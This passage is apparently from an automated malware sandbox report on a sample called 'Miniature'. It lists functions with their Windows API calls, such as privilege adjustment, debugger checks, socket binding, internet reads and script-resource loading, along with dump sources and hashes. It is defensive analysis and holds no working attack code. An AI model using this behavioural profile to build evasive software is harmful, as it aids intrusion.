                                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00C556C2,?,?,00000000,00000000,?,?,?,?,?,?,00C166CE), ref: 00C83A56
                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00C556C2,?,?,00C556C2,?,?,00000000,00000000,?,?,?,?,?,?,00C166CE,?), ref: 00C83A65
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                            • Opcode ID: ff62ec53d7f97cd76eb922ab8cd808a7191633d1753bb6f4920cf44f91eafa96
                                                                                                                                                                                                                                                                                            • Instruction ID: 4e07dfe53288ca35c29de8add9cbdba73f6262f1946772e2022ea046b8aaf0dc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff62ec53d7f97cd76eb922ab8cd808a7191633d1753bb6f4920cf44f91eafa96
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9117C70200701BFD7259B65DC48F6B7BB9EBC5B48F14426CB81297690DBB1DD01D620
                                                                                                                                                                                                                                                                                            Function 00C720AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C71916
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C71922
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C71931
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C71938
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7194E
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00C71C81), ref: 00C720FB
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C72107
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C7210E
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C72127
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C71C81), ref: 00C7213B
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C72142
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 244b9484e5eedc22dac9f4d6950c11ccd723091e3aa92455eb8301c310b3d7b1
                                                                                                                                                                                                                                                                                            • Instruction ID: c0f1244563ee2c998de56ca91be3a59d6c7a096ceb3f6c543027655ba2b0e55d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 244b9484e5eedc22dac9f4d6950c11ccd723091e3aa92455eb8301c310b3d7b1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D11D071600205FFDB109F64CC09BAE7BB9FF4535AF548018EA5B97120C7359E41CB60
                                                                                                                                                                                                                                                                                            Function 00C8A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C8A5BD
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C8A6D0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C842B9: GetInputState.USER32 ref: 00C84310
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C843AB
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C8A5ED
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C8A6BA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: d02e98831e66fc6a46da6f3efe01095ff9fcc56eb43f68b5b6ed10ebd190e22c
                                                                                                                                                                                                                                                                                            • Instruction ID: 479ca8afff5b35e4966eac1091930d0ec5fc530bc26a17f1c2e7ab68133d04db
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d02e98831e66fc6a46da6f3efe01095ff9fcc56eb43f68b5b6ed10ebd190e22c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E414F7190020AAFDF14EF64C849AEEBBB4FF05318F144156F815A21A1EB309F84DF65
                                                                                                                                                                                                                                                                                            Function 00C122AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 00C1233E
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C12421
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00C12434
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9ad8b5f09b7e730fb7f786eca2e81522a75c4e3ce0c378d932660ccdc4b8b43e
                                                                                                                                                                                                                                                                                            • Instruction ID: 326d1838a1383845948cb9871ee5fcef8225d393f9af27fa60137effe146a02b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ad8b5f09b7e730fb7f786eca2e81522a75c4e3ce0c378d932660ccdc4b8b43e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A8158FC504484BEE22C663E4C89EFF154DDB47385F550109F922C65A2C9698FE2B23A
                                                                                                                                                                                                                                                                                            Function 00C92263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C93AD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: _wcslen.LIBCMT ref: 00C93AF8
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C922BA
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C922E1
                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C92338
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C92343
                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C92372
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6c49d34332d4b1c5c73bfeac559f79ef0ef8180e79bdbf2e84c9c832aa429327
                                                                                                                                                                                                                                                                                            • Instruction ID: 426a5c43d6a0237c490dcfdcc0662c6579ccd9413106dcd774551f222cfe8b5c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c49d34332d4b1c5c73bfeac559f79ef0ef8180e79bdbf2e84c9c832aa429327
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3751F775A00210AFDB10AF24C886F6A77E5AF46768F488048F9569F3D3CB74AD41DBE1
                                                                                                                                                                                                                                                                                            Function 00CA26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1206f6cb78dc668c9ded26421e118af669096fbbca97820d546eac8a4b993db0
                                                                                                                                                                                                                                                                                            • Instruction ID: 899fcc313cc030ab65891f424c41d565bd3e078086568b9211c7609be2e59644
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1206f6cb78dc668c9ded26421e118af669096fbbca97820d546eac8a4b993db0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8421F4317002228FD7119F2AC844B5A7BE5EF87318F588068E85ACB351CB71EF42CB90
                                                                                                                                                                                                                                                                                            Function 00C8D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00C8D8CE
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C8D92F
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00C8D943
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ca62c86aced49dedde83a368af7d78d160dc1f065313968a776a80a1839ff5d3
                                                                                                                                                                                                                                                                                            • Instruction ID: 2f8e5c190d107dae3a275dafa359aed165d7a9fee8b1f9e79e35c1948b6e5cac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca62c86aced49dedde83a368af7d78d160dc1f065313968a776a80a1839ff5d3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F219071500705EFEB20AF66D884BAB77F8AB41318F10441EE65792191EB70EE05DB94
                                                                                                                                                                                                                                                                                            Function 00C7E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00C546AC), ref: 00C7E482
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C7E491
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7E4A2
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7E4AE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a1c28498250ae8fc5962b8701ade4595991745a38996234dc2c29ac800cc9929
                                                                                                                                                                                                                                                                                            • Instruction ID: b8edba047693f5505597262257f8a20bc00b7bbdd03e013c6ea64971d8155c54
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1c28498250ae8fc5962b8701ade4595991745a38996234dc2c29ac800cc9929
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF0E53241091057D21177BCAC0DAAF776DAE07339B508781F83BC34F0D7789E958695
                                                                                                                                                                                                                                                                                            Function 00C6E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                            • Opcode ID: 682136ca7adb1b962a87b7fb4d92eeea727ef9aee1018fe0267ed90efaaf9aff
                                                                                                                                                                                                                                                                                            • Instruction ID: 82e3a20db83b38f7d3ca773d9f469d0f587da028a840676b99796f35c60bab6e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 682136ca7adb1b962a87b7fb4d92eeea727ef9aee1018fe0267ed90efaaf9aff
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07D012B9C0411CE6CBA09691DCC8DBD737CAB19700F208467F906A1000E624D908AB22
                                                                                                                                                                                                                                                                                            Function 00C42992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00C42A8A
                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00C42A94
                                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00C42AA1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0694360f9c837a89c891f33aa6975b3ab0177dbb62c1cb9bcab0cf8f341f706d
                                                                                                                                                                                                                                                                                            • Instruction ID: 77c61a05b3399f9f773c740352be93ce773888f7548e531800bf68175983c8ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0694360f9c837a89c891f33aa6975b3ab0177dbb62c1cb9bcab0cf8f341f706d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31D375911228ABCB21DF68D9897DCBBB8BF08310F5042DAE81DA7260E7309F85CF45
                                                                                                                                                                                                                                                                                            Function 00C72010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C309D8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C309F5
                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7205A
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C72087
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C72097
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6aeb13a4e4da3166613c948ed8736f6f77b720ed9064b1fc5acaee4d0aa0f52a
                                                                                                                                                                                                                                                                                            • Instruction ID: 24c1178c6e71e7f58a781b5ffcfd90e068f8e9d77edde561b2af19eac4b35cc2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6aeb13a4e4da3166613c948ed8736f6f77b720ed9064b1fc5acaee4d0aa0f52a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11BCB2410204AFD718AF64ECC6E6FBBB8EB05714F20C42EE05B53251EB70BC41CA20
                                                                                                                                                                                                                                                                                            Function 00C35058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002,00000000), ref: 00C35079
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002,00000000), ref: 00C35080
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00C35092
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
